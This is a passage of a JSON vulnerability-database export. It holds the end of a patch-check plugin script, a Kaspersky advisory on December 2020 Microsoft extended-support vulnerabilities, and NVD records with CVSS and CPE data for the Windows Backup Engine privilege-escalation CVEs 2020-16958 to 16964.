hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "kaspersky": [{"lastseen": "2021-08-18T10:59:18", "description": "### *Detect date*:\n12/08/2020\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). Malicious users can exploit these vulnerabilities to gain privileges, obtain sensitive information.\n\n### *Affected products*:\nWindows Server, version 2004 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 1909 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2016 \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 10 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows RT 8.1 \nWindows 10 Version 1803 for 32-bit Systems \nWindows Server 2016 (Server Core installation) \nWindows Server 2012 (Server Core installation) \nWindows Server 2019 \nWindows 10 Version 1909 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2012 R2 \nWindows Server, version 1903 (Server Core installation) \nWindows 10 Version 1803 for ARM64-based Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows Server, version 20H2 (Server Core Installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-16959](<https://nvd.nist.gov/vuln/detail/CVE-2020-16959>) \n[CVE-2020-16958](<https://nvd.nist.gov/vuln/detail/CVE-2020-16958>) \n[CVE-2020-16961](<https://nvd.nist.gov/vuln/detail/CVE-2020-16961>) \n[CVE-2020-17098](<https://nvd.nist.gov/vuln/detail/CVE-2020-17098>) \n[CVE-2020-16964](<https://nvd.nist.gov/vuln/detail/CVE-2020-16964>) \n[CVE-2020-16960](<https://nvd.nist.gov/vuln/detail/CVE-2020-16960>) \n[CVE-2020-17140](<https://nvd.nist.gov/vuln/detail/CVE-2020-17140>) \n[CVE-2020-16962](<https://nvd.nist.gov/vuln/detail/CVE-2020-16962>) \n[CVE-2020-16963](<https://nvd.nist.gov/vuln/detail/CVE-2020-16963>) \n[ADV200013](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/ADV200013>) \n\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2020-16964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16964>)7.2High \n[CVE-2020-16960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16960>)7.2High \n[CVE-2020-17140](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17140>)4.0Warning \n[CVE-2020-16962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16962>)7.2High \n[CVE-2020-16963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16963>)7.2High \n[CVE-2020-16961](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16961>)7.2High \n[CVE-2020-17098](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17098>)2.1Warning \n[CVE-2020-16959](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16959>)7.2High \n[CVE-2020-16958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16958>)7.2High\n\n### *KB list*:\n[4592504](<http://support.microsoft.com/kb/4592504>) \n[4592471](<http://support.microsoft.com/kb/4592471>) \n[4592498](<http://support.microsoft.com/kb/4592498>) \n[4592503](<http://support.microsoft.com/kb/4592503>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T00:00:00", "type": "kaspersky", "title": "KLA12025 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964", "CVE-2020-17098", "CVE-2020-17140"], "modified": "2020-12-16T00:00:00", "id": "KLA12025", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12025/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T14:27:36", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16963, CVE-2020-16964.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-16962", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-16962", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16962", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:x64:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:27:32", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-16961", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-16961", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16961", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:x64:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:27:37", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16964.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-16963", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-16963", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16963", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:x64:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:27:34", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-16960", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-16960", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16960", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:x64:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:27:28", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-16959", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-16959", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16959", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:x64:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:27:26", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-16958", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-16958", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16958", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:x64:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:27:52", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 